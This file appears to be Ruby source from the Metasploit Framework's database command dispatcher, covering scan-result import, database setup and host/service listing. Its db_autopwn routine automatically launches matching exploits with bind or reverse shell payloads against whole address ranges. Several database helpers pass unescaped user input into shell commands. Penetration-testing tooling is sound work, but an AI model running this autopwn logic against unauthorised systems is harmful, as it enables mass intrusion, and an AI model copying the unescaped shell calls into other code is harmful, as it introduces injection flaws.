require 'rexml/document' # This parser does not maintain state as well as a tree parser, so malformed # xml will trip it up. Nmap doesn't output malformed xml, so it's not really a # big deal. class NmapXMLStreamParser attr_accessor :framework def initialize(framework) @framework = framework reset_state end def reset_state @addr = nil @status = nil @ports = [] end def tag_start(name, attr_hash) case name when "address" if (attr_hash["addrtype"] =~ /ipv[46]/) @addr = attr_hash["addr"] end when "status" @status = (attr_hash["state"] == "up" ? Msf::HostState::Alive : Msf::HostState::Dead) when "port" @ports.push(attr_hash) when "state" @ports.last["state"] = attr_hash["state"] when "service" @ports.last["name"] = attr_hash["name"] end end def tag_end(name) case name when "host" host = framework.db.get_host(nil, @addr) if not host reset_state return end framework.db.report_host_state(self, @addr, @status) @ports.each { |port| proto = port['protocol'] pnum = port['portid'] service = framework.db.get_service(nil, host, proto.downcase, pnum.to_i) if name != "unknown" service.name = port["name"] end service.state = port["state"] service.save } reset_state end end # We don't need these methods, but they're necessary to keep REXML happy def text(str); end def xmldecl(version, encoding, standalone); end def cdata; end def comment(str); end def instruction(name, instruction); end def attlist; end end module Msf module Ui module Console module CommandDispatcher class Db require 'tempfile' include Msf::Ui::Console::CommandDispatcher # # Constants # PWN_SHOW = 2**0 PWN_XREF = 2**1 PWN_PORT = 2**2 PWN_EXPL = 2**3 PWN_SING = 2**4 PWN_SLNT = 2**5 # # The dispatcher's name. # def name "Database Backend" end # # Returns the hash of commands supported by this dispatcher. # def commands base = { "db_driver" => "Specify a database driver", "db_connect" => "Connect to an existing database", "db_disconnect" => "Disconnect from the current database instance", "db_create" => "Create a brand new database", "db_destroy" => "Drop an existing database", } more = { "db_hosts" => "List all hosts in the database", "db_services" => "List all services in the database", "db_vulns" => "List all vulnerabilities in the database", "db_notes" => "List all notes in the database", "db_add_host" => "Add one or more hosts to the database", "db_add_port" => "Add a port to host", "db_add_note" => "Add a note to host", "db_del_host" => "Delete one or more hosts from the database", "db_del_port" => "Delete one port from the database", "db_autopwn" => "Automatically exploit everything", "db_import_amap_mlog" => "Import a THC-Amap scan results file (-o -m)", "db_import_nessus_nbe" => "Import a Nessus scan result file (NBE)", "db_import_nessus_xml" => "Import a Nessus scan result file (NESSUS)", "db_import_nmap_xml" => "Import a Nmap scan results file (-oX)", "db_nmap" => "Executes nmap and records the output automatically", } framework.db.active ? base.merge(more) : base end def cmd_db_hosts(*args) onlyup = false hosts = nil while (arg = args.shift) case arg when '-u','--up' onlyup = true when '-a' hostlist = args.shift if(!hostlist) print_status("Invalid host list") return end hosts = hostlist.strip().split(",") when '-h','--help' print_status("Usage: db_hosts [-h|--help] [-u|--up] [-a ]") print_line(" -u,--up Only show hosts which are up") print_line(" -a Search for a list of addresses") print_line(" -h,--help Show this help information") return end end framework.db.each_host do |host| next if(onlyup and host.state == "down") next if(hosts != nil and hosts.index(host.address) == nil) print_status("Time: #{host.created} Host: #{host.address} Status: #{host.state} OS: #{host.os_name} #{host.os_flavor}") end end def cmd_db_services(*args) onlyup = false hosts = nil ports = nil proto = nil name = nil while (arg = args.shift) case arg when '-u','--up' onlyup = true when '-a' hostlist = args.shift if(!hostlist) print_status("Invalid host list") return end hosts = hostlist.strip().split(",") when '-p' portlist = args.shift if(!portlist) print_status("Invalid port list") return end ports = portlist.strip().split(",") when '-r' proto = args.shift if(proto == nil) print_status("Invalid protocol") return end proto = proto.strip() when '-n' namelist = args.shift if(!namelist) print_status("Invalid name list") return end names = namelist.strip().split(",") when '-h','--help' print_status("Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ]") print_line(" -u,--up Only show services which are up") print_line(" -r Only show [tcp|udp] services") print_line(" -a Search for a list of addresses") print_line(" -p Search for a list of ports") print_line(" -n Search for a list of service names") print_line(" -h,--help Show this help information") return end end framework.db.each_service do |service| next if(onlyup and !(service.state == "open" || service.state == "up")) next if(proto and service.proto != proto) next if(hosts and hosts.index(service.host.address) == nil) next if(ports and ports.index(service.port.to_s) == nil) next if(names and names.index(service.name) == nil) print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state} name=#{service.name}") end end def cmd_db_vulns(*args) framework.db.each_vuln do |vuln| reflist = vuln.refs.map { |r| r.name } print_status("Time: #{vuln.created} Vuln: host=#{vuln.host.address} port=#{vuln.service.port} proto=#{vuln.service.proto} name=#{vuln.name} refs=#{reflist.join(',')}") end end def cmd_db_notes(*args) hosts = nil types = nil while (arg = args.shift) case arg when '-a' hostlist = args.shift if(!hostlist) print_status("Invalid host list") return end hosts = hostlist.strip().split(",") when '-t' typelist = args.shift if(!typelist) print_status("Invalid host list") return end types = typelist.strip().split(",") when '-h','--help' print_status("Usage: db_notes [-h|--help] [-a ] [-t ]") print_line(" -a Search for a list of addresses") print_line(" -t Search for a list of types") print_line(" -h,--help Show this help information") return end end framework.db.each_note do |note| next if(hosts and hosts.index(note.host.address) == nil) next if(types and types.index(note.ntype) == nil) print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}") end end def cmd_db_add_host(*args) print_status("Adding #{args.length} hosts...") args.each do |address| host = framework.db.get_host(nil, address) print_status("Time: #{host.created} Host: host=#{host.address}") end end def cmd_db_add_port(*args) if (not args or args.length < 3) print_status("Usage: db_add_port [host] [port] [proto]") return end host = framework.db.get_host(nil, args[0]) return if not host service = framework.db.get_service(nil, host, args[2].downcase, args[1].to_i) return if not service print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state}") end def cmd_db_del_port(*args) if (not args or args.length < 3) print_status("Usage: db_del_port [host] [port] [proto]") return end if framework.db.del_service(nil, args[0], args[2].downcase, args[1].to_i) print_status("Service: host=#{args[0]} port=#{args[1].to_i} proto=#{args[2].downcase} deleted") end end def cmd_db_add_note(*args) if (not args or args.length < 3) print_status("Usage: db_add_note [host] [type] [note]") return end naddr = args.shift ntype = args.shift ndata = args.join(" ") host = framework.db.get_host(nil, naddr) return if not host note = framework.db.get_note(nil, host, ntype, ndata) return if not note print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}") end def cmd_db_del_host(*args) args.each do |address| if framework.db.del_host(nil, address) print_status("Host #{address} deleted") end end end # # A shotgun approach to network-wide exploitation # def cmd_db_autopwn(*args) stamp = Time.now.to_f vcnt = 0 rcnt = 0 mode = 0 code = :bind mjob = 5 regx = nil port_inc = [] port_exc = [] targ_inc = [] targ_exc = [] args.push("-h") if args.length == 0 while (arg = args.shift) case arg when '-t' mode |= PWN_SHOW when '-x' mode |= PWN_XREF when '-p' mode |= PWN_PORT when '-e' mode |= PWN_EXPL when '-s' mode |= PWN_SING when '-q' mode |= PWN_SLNT when '-j' mjob = args.shift.to_i when '-r' code = :conn when '-b' code = :bind when '-I' targ_inc << OptAddressRange.new('TEMPRANGE', [ true, '' ]).normalize(args.shift) when '-X' targ_exc << OptAddressRange.new('TEMPRANGE', [ true, '' ]).normalize(args.shift) when '-PI' port_inc = Rex::Socket.portspec_crack(args.shift) when '-PX' port_exc = Rex::Socket.portspec_crack(args.shift) when '-m' regx = args.shift when '-h','--help' print_status("Usage: db_autopwn [options]") print_line("\t-h Display this help text") print_line("\t-t Show all matching exploit modules") print_line("\t-x Select modules based on vulnerability references") print_line("\t-p Select modules based on open ports") print_line("\t-e Launch exploits against all matched targets") # print_line("\t-s Only obtain a single shell per target system (NON-FUNCTIONAL)") print_line("\t-r Use a reverse connect shell") print_line("\t-b Use a bind shell on a random port (default)") print_line("\t-q Disable exploit module output") print_line("\t-I [range] Only exploit hosts inside this range") print_line("\t-X [range] Always exclude hosts inside this range") print_line("\t-PI [range] Only exploit hosts with these ports open") print_line("\t-PX [range] Always exclude hosts with these ports open") print_line("\t-m [regex] Only run modules whose name matches the regex") print_line("") return end end matches = {} [ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype| # Scan all exploit modules for matching references mtype[0].each_module do |n,m| e = m.new # # Match based on vulnerability references # if (mode & PWN_XREF != 0) e.references.each do |r| rcnt += 1 ref_name = r.ctx_id + '-' + r.ctx_val ref = framework.db.has_ref?(ref_name) if (ref) ref.vulns.each do |vuln| vcnt += 1 serv = vuln.service next if not serv.host xport = serv.port xprot = serv.proto xhost = serv.host.address next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost)) next if (targ_exc.length > 0 and range_include?(targ_exc, xhost)) next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i)) next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i)) next if (regx and e.fullname !~ /#{regx}/) matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true end end end end # # Match based on ports alone # if (mode & PWN_PORT != 0) rports = {} rservs = {} if(e.datastore['RPORT']) rports[e.datastore['RPORT'].to_s] = true end if(e.respond_to?('autofilter_ports')) e.autofilter_ports.each do |rport| rports[rport.to_s] = true end end if(e.respond_to?('autofilter_services')) e.autofilter_services.each do |serv| rservs[serv] = true end end framework.db.services.each do |serv| next if not serv.host next if (serv.state != "open" && serv.state != "up") # Match port numbers rports.keys.sort.each do |rport| next if serv.port.to_i != rport.to_i xport = serv.port xprot = serv.proto xhost = serv.host.address next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost)) next if (targ_exc.length > 0 and range_include?(targ_exc, xhost)) next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i)) next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i)) next if (regx and e.fullname !~ /#{regx}/) matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true end # Match service names rservs.keys.sort.each do |rserv| next if serv.name.to_s != rserv xport = serv.port xprot = serv.proto xhost = serv.host.address next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost)) next if (targ_exc.length > 0 and range_include?(targ_exc, xhost)) next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i)) next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i)) next if (regx and e.fullname !~ /#{regx}/) matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true end end end end end if (mode & PWN_SHOW != 0) print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds (#{vcnt} vulns / #{rcnt} refs)") end idx = 0 matches.each_key do |xref| idx += 1 begin mod = nil if ((mod = framework.modules.create(xref[3])) == nil) print_status("Failed to initialize #{xref[3]}") next end if (mode & PWN_SHOW != 0) print_status("Matched #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...") end # # The code is just a proof-of-concept and will be expanded in the future # if (mode & PWN_EXPL != 0) mod.datastore['RHOST'] = xref[2] mod.datastore['RPORT'] = xref[0].to_s if (code == :bind) mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s if(mod.fullname =~ /\/windows\//) mod.datastore['PAYLOAD'] = 'windows/meterpreter/bind_tcp' else mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp' end end if (code == :conn) mod.datastore['LHOST'] = Rex::Socket.source_address(xref[2]) mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s if (mod.datastore['LHOST'] == '127.0.0.1') print_status("Failed to determine listener address for target #{xref[2]}...") next end if(mod.fullname =~ /\/windows\//) mod.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp' else mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp' end end if(framework.jobs.keys.length >= mjob) print_status("Job limit reached, waiting on modules to finish...") while(framework.jobs.keys.length >= mjob) select(nil, nil, nil, 0.25) end end next if not mod.autofilter() print_status("(#{idx}/#{matches.length}): Launching #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...") begin inp = (mode & PWN_SLNT != 0) ? nil : driver.input out = (mode & PWN_SLNT != 0) ? nil : driver.output case mod.type when MODULE_EXPLOIT session = mod.exploit_simple( 'Payload' => mod.datastore['PAYLOAD'], 'LocalInput' => inp, 'LocalOutput' => out, 'RunAsJob' => true) when MODULE_AUX session = mod.run_simple( 'LocalInput' => inp, 'LocalOutput' => out, 'RunAsJob' => true) end rescue ::Interrupt raise $! rescue ::Exception print_status(" >> autopwn exception during launch from #{xref[3]}: #{$!} ") end end rescue ::Interrupt raise $! rescue ::Exception print_status(" >> autopwn exception from #{xref[3]}: #{$!} #{$!.backtrace}") end end # EOM end # # This holds all of the shared parsing/handling used by the # Nessus NBE and NESSUS methods # def handle_nessus(addr, port, nasl, data) p = port.match(/^([^\(]+)\((\d+)\/([^\)]+)\)/) return if not p host = framework.db.get_host(nil, addr) return if not host if host.state != Msf::HostState::Alive framework.db.report_host_state(self, addr, Msf::HostState::Alive) end service = framework.db.get_service(nil, host, p[3].downcase, p[2].to_i) name = p[1].strip if name != "unknown" service.name = name service.save end return if not nasl data.gsub!("\\n", "\n") refs = {} if (data =~ /^CVE : (.*)$/) $1.gsub(/C(VE|AN)\-/, '').split(',').map { |r| r.strip }.each do |r| refs[ 'CVE-' + r ] = true end end if (data =~ /^BID : (.*)$/) $1.split(',').map { |r| r.strip }.each do |r| refs[ 'BID-' + r ] = true end end if (data =~ /^Other references : (.*)$/) $1.split(',').map { |r| r.strip }.each do |r| ref_id, ref_val = r.split(':') ref_val ? refs[ ref_id + '-' + ref_val ] = true : refs[ ref_id ] = true end end nss = 'NSS-' + nasl.to_s vuln = framework.db.get_vuln(nil, host, service, nss, data) rids = [] refs.keys.each do |r| rids << framework.db.get_ref(nil, r) end vuln.refs << (rids - vuln.refs) end # # Import Nessus NBE files # def cmd_db_import_nessus_nbe(*args) if (not (args and args.length == 1)) print_status("Usage: db_import_nessus_nbe [nessus.nbe]") return end if (not File.readable?(args[0])) print_status("Could not read the NBE file") return end fd = File.open(args[0], 'r') fd.each_line do |line| r = line.split('|') next if r[0] != 'results' addr = r[2] port = r[3] nasl = r[4] data = r[6] handle_nessus(addr, port, nasl, data) end fd.close end # # Import Nessus NESSUS files # def cmd_db_import_nessus_xml(*args) if (not (args and args.length == 1)) print_status("Usage: db_import_nessus_xml [nessus.nessus]") return end if (not File.readable?(args[0])) print_status("Could not read the NESSUS file") return end fd = File.open(args[0], 'r') data = fd.read fd.close doc = REXML::Document.new(data) doc.elements.each('/NessusClientData/Report/ReportHost') do |host| addr = host.elements['HostName'].text host.elements.each('ReportItem') do |item| nasl = item.elements['pluginID'].text port = item.elements['port'].text data = item.elements['data'].text handle_nessus(addr, port, nasl, data) end end end # # Import Nmap data from a file # def cmd_db_import_nmap_xml(*args) if (not (args and args.length == 1)) print_status("Usage: db_import_nmap_xml [nmap.xml]") return end if (not File.readable?(args[0])) print_status("Could not read the XML file") return end load_nmap_xml(args[0]) end # # Import Nmap data from a file # def cmd_db_nmap(*args) if (args.length == 0) print_status("Usage: db_nmap [nmap options]") return end nmap = Rex::FileUtils.find_full_path("nmap") || Rex::FileUtils.find_full_path("nmap.exe") if(not nmap) print_error("The nmap executable could not be found") return end fd = Tempfile.new('dbnmap') fo = Tempfile.new('dbnmap') # When executing native Nmap in Cygwin, expand the Cygwin path to a Win32 path if(Rex::Compat.is_cygwin and nmap =~ /cygdrive/) # Custom function needed because cygpath breaks on 8.3 dirs tout = Rex::Compat.cygwin_to_win32(fd.path) fout = Rex::Compat.cygwin_to_win32(fo.path) args.push('-oX', tout) args.push('-oN', fout) else args.push('-oX', fd.path) args.push('-oN', fo.path) end system([nmap, "nmap"], *args) # Until we hide stdout above, this is pointless # fo.each_line do |line| # print_status("NMAP: #{line.strip}") # end ::File.unlink(fo.path) load_nmap_xml(fd.path) end # # Process Nmap XML data # def load_nmap_xml(filename) l = NmapXMLStreamParser.new(framework) REXML::Document.parse_stream(File.new(filename), l) end # # Import from a THC-Amap machine-readable log file # def cmd_db_import_amap_mlog(*args) if args.length == 0 print_status("Usage: db_import_amap_mlog [logfile]") return end if not File.readable?(args[0]) print_error("Could not read the log file") return end fd = File.open(args[0], 'r') fd.each_line do |line| line.sub!(/#.*/, "") r = line.split(':') next if r.length < 6 addr = r[0] port = r[1].to_i proto = r[2].downcase status = r[3] name = r[5] next if status != "open" host = framework.db.get_host(nil, addr) next if not host if host.state != Msf::HostState::Alive framework.db.report_host_state(self, addr, Msf::HostState::Alive) end service = framework.db.get_service(nil, host, proto, port) if not service.name and name != "unidentified" service.name = name service.save end end fd.close end # # Determine if an IP address is inside a given range # def range_include?(ranges, addr) ranges.each do |sets| sets.split(',').each do |set| rng = set.split('-').map{ |c| Rex::Socket::addr_atoi(c) } tst = Rex::Socket::addr_atoi(addr) if (not rng[1]) return tst == rng[0] elsif (tst >= rng[0] and tst <= rng[1]) return true end end end false end # # Database management # def db_check_driver if(not framework.db.driver) print_error("No database driver has been specified") return false end true end def cmd_db_driver(*args) if(args[0]) if(args[0] == "-h") print_status("Usage: db_driver [driver-name]") return end if(framework.db.drivers.include?(args[0])) framework.db.driver = args[0] print_status("Using database driver #{args[0]}") else print_error("Invalid driver specified") end return end if(framework.db.driver) print_status(" Active Driver: #{framework.db.driver}") else print_status("No Active Driver") end print_status(" Available: #{framework.db.drivers.join(", ")}") end def cmd_db_driver_tabs(str, words) return framework.db.drivers end def cmd_db_create(*args) return if not db_check_driver meth = "db_create_#{framework.db.driver}" if(self.respond_to?(meth)) self.send(meth, *args) else print_error("This database driver #{framework.db.driver} is not currently supported") end end def cmd_db_destroy(*args) return if not db_check_driver meth = "db_destroy_#{framework.db.driver}" if(self.respond_to?(meth)) self.send(meth, *args) else print_error("This database driver #{framework.db.driver} is not currently supported") end end def cmd_db_connect(*args) return if not db_check_driver meth = "db_connect_#{framework.db.driver}" if(self.respond_to?(meth)) self.send(meth, *args) else print_error("This database driver #{framework.db.driver} is not currently supported") end end def cmd_db_disconnect(*args) return if not db_check_driver meth = "db_disconnect_#{framework.db.driver}" if(self.respond_to?(meth)) self.send(meth, *args) else print_error("This database driver #{framework.db.driver} is not currently supported") end end # # Database management: SQLite3 # # # Disconnect from the current SQLite3 instance # def db_disconnect_sqlite3(*args) if (framework.db) framework.db.disconnect() end end # # Connect to an existing SQLite database # def db_connect_sqlite3(*args) info = db_parse_db_uri_sqlite3(args[0]) opts = { 'adapter' => 'sqlite3' } opts['dbfile'] = info[:path] if (not File.exists?(opts['dbfile'])) print_error("The specified database does not exist") return end if (not framework.db.connect(opts)) raise RuntimeError.new("Failed to connect to the database") end print_status("Successfully connected to the database") print_status("File: #{opts['dbfile']}") end # # Create a new SQLite database instance # def db_create_sqlite3(*args) cmd_db_disconnect() info = db_parse_db_uri_sqlite3(args[0]) opts = { 'adapter' => 'sqlite3' } opts['dbfile'] = info[:path] sql = ::File.join(Msf::Config.install_root, "data", "sql", "sqlite.sql") if (::File.exists?(opts['dbfile'])) print_status("The specified database already exists, connecting") else print_status("Creating a new database instance...") require_library_or_gem('sqlite3') db = ::SQLite3::Database.new(opts['dbfile']) ::File.read(sql).split(";").each do |line| begin db.execute(line.strip) rescue ::SQLite3::SQLException, ::SQLite3::MisuseException end end db.close end if (not framework.db.connect(opts)) raise RuntimeError.new("Failed to connect to the database") end print_status("Successfully connected to the database") print_status("File: #{opts['dbfile']}") end # # Drop an existing database # def db_destroy_sqlite3(*args) cmd_db_disconnect() info = db_parse_db_uri_sqlite3(args[0]) begin File.unlink(info[:path]) rescue Errno::ENOENT print_error("The specified database does not exist") end end def db_parse_db_uri_sqlite3(path) res = {} res[:path] = path || ::File.join(Msf::Config.config_directory, 'sqlite3.db') res end # # Database management: MySQL # # # Disconnect from the current MySQL instance # def db_disconnect_mysql(*args) if (framework.db) framework.db.disconnect() end end # # Connect to an existing MySQL database # def db_connect_mysql(*args) info = db_parse_db_uri_mysql(args[0]) opts = { 'adapter' => 'mysql' } opts['username'] = info[:user] if (info[:user]) opts['password'] = info[:pass] if (info[:pass]) opts['database'] = info[:name] opts['host'] = info[:host] if (info[:host]) opts['port'] = info[:port] if (info[:port]) # This is an ugly hack for a broken MySQL adapter: # http://dev.rubyonrails.org/ticket/3338 if (opts['host'].strip.downcase == 'localhost') opts['host'] = Socket.gethostbyname("localhost")[3].unpack("C*").join(".") end if (not framework.db.connect(opts)) raise RuntimeError.new("Failed to connect to the database") end end # # Create a new MySQL database instance # def db_create_mysql(*args) cmd_db_disconnect() info = db_parse_db_uri_mysql(args[0]) opts = { 'adapter' => 'mysql' } argv = [] if (info[:user]) opts['username'] = info[:user] argv.push('-u') argv.push(info[:user]) end if (info[:pass]) argv.push('--password=' + info[:pass]) opts['password'] = info[:pass] end if (info[:host]) opts['host'] = info[:host] argv.push('-h') argv.push(info[:host]) end if (info[:port]) opts['port'] = info[:port] argv.push('-P') argv.push(info[:port]) # This is an ugly hack for a broken MySQL adapter: # http://dev.rubyonrails.org/ticket/3338 if (opts['host'].strip.downcase == 'localhost') opts['host'] = Socket.gethostbyname("localhost")[3].unpack("C*").join(".") end end argv.push('-f') opts['database'] = info[:name] cargs = argv.map{|c| "'#{c}' "}.join sql = File.join(Msf::Config.install_root, "data", "sql", "mysql.sql") fd = File.open(sql, 'r') system("mysqladmin #{cargs} drop #{info[:name]} >/dev/null 2>&1") system("mysqladmin #{cargs} create #{info[:name]}") psql = File.popen("mysql #{cargs} #{info[:name]}", "w") psql.write(fd.read) psql.close fd.close print_status("Database creation complete (check for errors)") if (not framework.db.connect(opts)) raise RuntimeError.new("Failed to connect to the database") end end # # Drop an existing database # def db_destroy_mysql(*args) cmd_db_disconnect() info = db_parse_db_uri_mysql(args[0]) argv = [] if (info[:user]) argv.push('-u') argv.push(info[:user]) end if (info[:pass]) argv.push('--password=' + info[:pass]) end if (info[:host]) argv.push('-h') argv.push(info[:host]) end if (info[:port]) argv.push('-P') argv.push(info[:port]) end argv.push("-f") cargs = argv.map{|c| "'#{c}' "}.join system("mysqladmin -f #{cargs} drop #{info[:name]}") end def db_parse_db_uri_mysql(path) res = {} if (path) auth, dest = path.split('@') (dest = auth and auth = nil) if not dest res[:user],res[:pass] = auth.split(':') if auth targ,name = dest.split('/') (name = targ and targ = nil) if not name res[:host],res[:port] = targ.split(':') if targ end res[:name] = name || 'metasploit3' res end # # Database management: Postgres # # # Disconnect from the current Postgres instance # def db_disconnect_postgresql(*args) if (framework.db) framework.db.disconnect() end end # # Connect to an existing Postgres database # def db_connect_postgresql(*args) info = db_parse_db_uri_postgresql(args[0]) opts = { 'adapter' => 'postgresql' } opts['username'] = info[:user] if (info[:user]) opts['password'] = info[:pass] if (info[:pass]) opts['database'] = info[:name] opts['host'] = info[:host] if (info[:host]) opts['port'] = info[:port] if (info[:port]) if (not framework.db.connect(opts)) raise RuntimeError.new("Failed to connect to the database") end end # # Create a new Postgres database instance # def db_create_postgresql(*args) cmd_db_disconnect() info = db_parse_db_uri_postgresql(args[0]) opts = { 'adapter' => 'postgresql' } argv = [] if (info[:user]) opts['username'] = info[:user] argv.push('-U') argv.push(info[:user]) else opts['username'] = 'postgres' argv.push('-U') argv.push('postgres') end if (info[:pass]) print() print_status("Warning: You will need to enter the password at the prompts below") print() argv.push('-W') end if (info[:host]) opts['host'] = info[:host] argv.push('-h') argv.push(info[:host]) end if (info[:port]) opts['port'] = info[:port] argv.push('-p') argv.push(info[:port]) end opts['database'] = info[:name] cargs = argv.map{|c| "'#{c}' "}.join sql = File.join(Msf::Config.install_root, "data", "sql", "postgres.sql") fd = File.open(sql, 'r') system("dropdb #{cargs} #{info[:name]} >/dev/null 2>&1") system("createdb #{cargs} #{info[:name]}") psql = File.popen("psql -q " + cargs + info[:name], "w") psql.write(fd.read) psql.close fd.close print_status("Database creation complete (check for errors)") if (not framework.db.connect(opts)) raise RuntimeError.new("Failed to connect to the database") end end # # Drop an existing database # def db_destroy_postgresql(*args) cmd_db_disconnect() info = db_parse_db_uri_postgresql(args[0]) argv = [] if (info[:user]) argv.push('-U') argv.push(info[:user]) end if (info[:pass]) print() print_status("Warning: You will need to enter the password at the prompts below") print() argv.push('-W') end if (info[:host]) argv.push('-h') argv.push(info[:host]) end if (info[:port]) argv.push('-p') argv.push(info[:port]) end cargs = argv.map{|c| "'#{c}' "}.join system("dropdb #{cargs} #{info[:name]}") end def db_parse_db_uri_postgresql(path) res = {} if (path) auth, dest = path.split('@') (dest = auth and auth = nil) if not dest res[:user],res[:pass] = auth.split(':') if auth targ,name = dest.split('/') (name = targ and targ = nil) if not name res[:host],res[:port] = targ.split(':') if targ end res[:name] = name || 'metasploit3' res end end end end end end